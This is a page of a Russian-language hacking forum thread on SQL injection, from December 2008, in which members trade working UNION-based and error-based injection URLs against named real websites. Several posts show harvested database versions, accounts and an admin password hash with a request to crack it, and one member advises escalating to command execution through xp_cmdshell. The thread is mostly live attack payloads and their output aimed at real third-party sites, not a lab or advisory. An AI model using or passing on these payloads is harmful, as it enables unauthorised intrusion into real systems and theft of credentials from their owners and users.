HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 728 из 1604 « Первая < 228628678718 724 725 726 727 728 729 730 731 732 7387788281228 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #7271  
Старый 31.12.2008, 05:58
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
С нами: 9644530

Репутация: 443
По умолчанию
Пройдёмся по магазинчикам!

http://shopping.sify.com/shopping/category.php?pid=20282+union+select+1,2,concat_ws( 0x3a3a,version(),user(),database()),4/*&?vsv=MALLHPBOOKS

Database Version: 5.0.45-log
Database name: cms
User name: spfclogin@202.144.65.156

http://www.cafegadgets.com/advanced_search_result.php?keywords=d2&search_in_d escription=1&categories_id=&inc_subcat=1&manufactu rers_id=-94+union+select+concat_ws(0x3a3a,version(),user(), database())--

5.0.67-community-log
cafe_cafe@localhost
cafe_cafeindia Webstore
 
Ответить с цитированием

  #7272  
Старый 31.12.2008, 06:44
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
С нами: 9216251

Репутация: 30
По умолчанию
vladvk,
Правильно так:
Цитата:
http://www.carli.illinois.edu/reports/prodvett/indiv_prop.php?id=-40+union+select+1,2,3,4,5,6,concat(username,char(5 8),password),8,9,10,11,12,13,14,15,16+from+cms.cms _users+limit+0,1/*
 
Ответить с цитированием

  #7273  
Старый 31.12.2008, 11:25
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами: 9147012

Репутация: 9
По умолчанию
Код:
http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+id+FROM+vacancy)--
Кто дальше сможет? ))
 
Ответить с цитированием

  #7274  
Старый 31.12.2008, 12:20
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию
Код:
http://www.amazingsportsphotos.com/shop/insertorder.cfm?CFID=3371&CFTOKEN=53570656+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
5.0.67-community-nt-log
Код:
http://www.appointmentsatfive.com/insertorder.cfm?CFID=102&CFTOKEN=94729224+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
5.0.67-community-nt-log
 
Ответить с цитированием

  #7275  
Старый 31.12.2008, 13:57
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами: 9147012

Репутация: 9
По умолчанию
Цитата:
Сообщение от spherics  
Пройдёмся по магазинчикам!

[B]http://shopping.sify.com/shopping/category.php?pid=20282+union+select+1,2,concat_ws( 0x3a3a,version(),user(),database()),4/*&?vsv=MALLHPBOOKS

Database Version: 5.0.45-log
Database name: cms
User name: spfclogin@202.144.65.156
Код:
http://shopping.sify.com/shopping/category.php?pid=20282+union+select+1,2,concat_ws(0x3a,userid,Name,Password,Email,Tel_Off,Tel_Res,Mobile,Enable,Creation_Date,Last_Mod_Date),4+from+User_Master+where+id='1'--
admin:F1A61D77BD363820BCAB7093B433360876BDDC34

хэш в пм плз, зарание спс
Да, и еще, кто админку нашел?
Последний раз редактировалось Gemini12; 31.12.2008 в 14:01..
 
Ответить с цитированием

  #7276  
Старый 31.12.2008, 14:53
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами: 10024314

Репутация: 739
По умолчанию
Цитата:
Сообщение от Gemini12  
Код:
http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+id+FROM+vacancy)--
Кто дальше сможет? ))
Дальше смотришь все таблицы в information_schema.
Цитата:
http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+table_name+from+in formation_schema.tables)--
Цитата:
Microsoft OLE DB Provider for SQL Server ошибка '80040e07'

Syntax error converting the nvarchar value 'tbl_comps' to a column of data type int.

/reviews/default.asp, line 40
Чтобы дальше смотреть используем NOT+IN
Цитата:
http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+table_name+from+in formation_schema.tables+where+table_name+NOT+IN('t bl_comps'))--
Ну и так дальше.
 
Ответить с цитированием

  #7277  
Старый 31.12.2008, 14:59
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами: 9147012

Репутация: 9
По умолчанию
Цитата:
Сообщение от ILYAtirtir  
Дальше смотришь все таблицы в information_schema.


Чтобы дальше смотреть используем NOT+IN

Ну и так дальше.
умный да? я это уже использовал, как думаешь я дошел до 'vacancy'...
 
Ответить с цитированием

  #7278  
Старый 31.12.2008, 18:00
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами: 10024314

Репутация: 739
По умолчанию
system_user "sa",значит дальше можно попробывать выполнить команды,xp_cmdshell итд
 
Ответить с цитированием

  #7279  
Старый 31.12.2008, 18:09
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами: 9147012

Репутация: 9
По умолчанию
Цитата:
Сообщение от ILYAtirtir  
system_user "sa",значит дальше можно попробывать выполнить команды,xp_cmdshell итд
А прав хватит?
 
Ответить с цитированием

  #7280  
Старый 31.12.2008, 19:03
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами: 9288132

Репутация: 571
По умолчанию
"Дайвинг-клуб Мегадайв"

Код:
http://megadive.ru/index.php?p=5&ti=-1+union+select+1,2,3,version(),5,6,7,8,9,10--
 
Ответить с цитированием
Ответ
Страница 728 из 1604 « Первая < 228628678718 724 725 726 727 728 729 730 731 732 7387788281228 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.